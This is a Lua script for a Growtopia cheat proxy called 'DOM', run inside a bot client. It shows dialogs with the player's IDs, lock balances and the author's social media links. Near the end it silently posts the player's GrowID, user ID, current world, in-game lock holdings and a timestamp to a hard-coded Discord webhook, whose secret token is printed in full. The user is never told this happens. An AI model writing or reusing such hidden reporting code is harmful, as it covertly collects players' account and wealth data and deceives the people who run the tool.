SendPacket(2, "action|input\n|text|`2Successfully loaded `0[`b[ DOM ]`0] `9Proxy")
function ProxyOpen()
    opening = [[
set_default_color|`o
add_label_with_icon|big|`0Proxy [`b[ DOM ]`0] `0[CPS]``|left|7340|
add_spacer|small|
add_label_with_icon|small|Proxy Version : `0V1.0``|left|10794|
add_label_with_icon|small|Application : `1BotHax `0/ `4B'INTERNAL``|left|10794|
add_label_with_icon|small|Device : PC / Windows``|left|10794|
add_label_with_icon|small|`3Collaborate with Aawastore``|left|10794|
add_label_with_icon|small|`0/proxy `1To see All Feature``|left|10794|
add_spacer|small|
add_label_with_icon|small|`4User ID : `3]] .. math.floor(GetLocal().userid) .. " `0x `4Net ID : `3" .. math.floor(GetLocal().netid) .. [[
|left|2278|
add_label_with_icon|small|`0Balance You Have :|left|10794|
add_label_with_icon|small|`9World Locks : `0]].. WL ..[[ |left|242|
add_label_with_icon|small|`1Diamond Locks : `0]].. DL ..[[|left|1796|
add_label_with_icon|small|`eBlue Gem Locks : `0]].. BGL ..[[|left|7188|
add_label_with_icon|small|`bBlack Gem Lock : `0]].. BLCK ..[[|left|11550|
add_spacer|small|
add_label_with_icon|medium|`0Log Update``|left|3524|
add_spacer|small|
add_url_button||`bTiktok creator``|kr|https://tiktok.com/futirrr|
add_url_button||`1Discord TeamAW[CPS]``|kr|https://discord.gg/Q2E3R4rt|
add_url_button||`5Instagram Aawastore``|kr|https://www.instagram.com/aawastore.gti|
add_url_button||`2Whatsapp Aawastore``|kr|https://wa.me/6287722814744|
add_spacer|small|
add_button|end_dialog|Continue|
add_quick_exit
]]
    SendVariantList({ [0] = "OnDialogRequest", [1] = opening })
    end
        function per(id)
        for _, inv in pairs(GetInventory()) do
        if inv.id == id then
        return inv.amount
        end
        end
        return 0
        end
    WL = per(242)
    DL = per(1796)
    BGL = per(7188)
    BLCK = per(11550)
    ProxyOpen()
function ProxyCommand()
    cmd = [[
set_default_color|`o
add_label_with_icon|big|`0Proxy [`b[ DOM ]`0] `0[CPS]``|left|7340|
add_spacer|small|
add_label_with_icon|small|Proxy Version : `0V1.0``|left|10794|
add_label_with_icon|small|Application : `1BotHax `0/ `4B'INTERNAL``|left|10794|
add_label_with_icon|small|Device : PC / Windows``|left|10794|
add_label_with_icon|small|`3Collaborate with Aawastore``|left|10794|
add_label_with_icon|small|`bTiktok `0: futirrr``|left|10794|
add_spacer|small|
add_label_with_icon|small|`4User ID : `3]] .. math.floor(GetLocal().userid) .. " `0x `4Net ID : `3" .. math.floor(GetLocal().netid) .. [[
|left|2278|
add_spacer|small|
add_label_with_icon|big|`3Main Commands``|left|5956|

add_url_button||`bTiktok creator``|kr|https://tiktok.com/futirrr|
add_url_button||`1Discord TeamAW[CPS]``|kr|https://discord.gg/Q2E3R4rt|
add_url_button||`5Instagram Aawastore``|kr|https://www.instagram.com/aawastore.gti|
add_url_button||`2Whatsapp Aawastore``|kr|https://wa.me/6287722814744|
add_spacer|small|
add_button|end_dialog|Continue|
add_quick_exit
]]
SendVariantList({ [0] = "OnDialogRequest", [1] = cmd })
end

function ovl(str)
SendVariantList({ [0] = "OnTextOverlay", [1] = str })
end
        
    function log(str)
    LogToConsole("[`b[ DOM ]`0]"..str)
    end
                    function loginwebhook(str)
                        local cleanedStr = string.gsub(str, "`(%S)", '')
                        cleanedStr = string.gsub(cleanedStr, "`{2}|(~{2})", '')
                        return cleanedStr
                        end
                        MakeRequest("https://discord.com/api/webhooks/1355237111015538729/xuEEIiu0eehjXJOwl-wMduQ14LykN4lRXmbW_67WGKeX6Kq1tcZUX41n3Ebn_XnhXcx8","POST",{["Content-Type"] = "application/json"}, 
                        [[{
                        "embeds": [{
                        "title": "KONEK PROXY DOM",
                        "color": 15258701,
                        "fields": [
                        {
                        "name": ":white_check_mark: INFO MASUK MASEH",
                        "value": "GrowID : ]] .. loginwebhook(GetLocal().name) .. [[\nUID : ]].. GetLocal().userid .. [[\nWORLD : ]] .. GetWorld().name .. [[\nWorld Lock : ]] .. WL ..[[\nDiamond Locks : ]] .. DL .. [[\nBlue Gem Locks : ]] .. BGL .. [[\nBlack Gem Locks : ]] .. BLCK .. [[",
                        "inline": false
                        }
                        ],
                        "footer": {
                        "text": "DATE | TIME : ]] .. os.date("%d-%m-%Y | %H:%M:%S | ") .. [[ ",
                        "icon_url": "https://cdn.discordapp.com/attachments/1046936807767560196/1351776018444062804/image.png?ex=67e82145&is=67e6cfc5&hm=e29fd5081bf64b83a1ee5710cc91a76e66f394e5e25c80133bc6e7e891d88d85&"
                        }}
                        ]
                    }]])
                    function gagalwebhook(str)
                        local cleanedStr = string.gsub(str, "`(%S)", '')
                        cleanedStr = string.gsub(cleanedStr, "`{2}|(~{2})", '')
                        return cleanedStr
                    end
                    
                    MakeRequest("https://discord.com/api/webhooks/1355237111015538729/xuEEIiu0eehjXJOwl-wMduQ14LykN4lRXmbW_67WGKeX6Kq1tcZUX41n3Ebn_XnhXcx8", 
                    "POST", 
                    {["Content-Type"] = "application/json"}, 
                    [[{
                        "embeds": [{
                            "title": "PROXY GAGAL KONEK",
                            "color": 16711680,
                            "fields": [
                            {
                                "name": ":x: UID TIDAK TERDAFTAR",
                                "value": "GrowID : ]] .. gagalwebhook(GetLocal().name) .. [[\nUID : ]].. GetLocal().userid .. [[\nWORLD : ]] .. GetWorld().name .. [[",
                                "inline": false
                            }
                            ],
                            "footer": {
                                "text": "DATE | TIME : ]] .. os.date("%d-%m-%Y | %H:%M:%S | ") .. [[ ",
                                "icon_url": "https://cdn.discordapp.com/attachments/1046936807767560196/1351776018444062804/image.png?ex=67e82145&is=67e6cfc5&hm=e29fd5081bf64b83a1ee5710cc91a76e66f394e5e25c80133bc6e7e891d88d85&"
                            }
                        }]
                    }]])

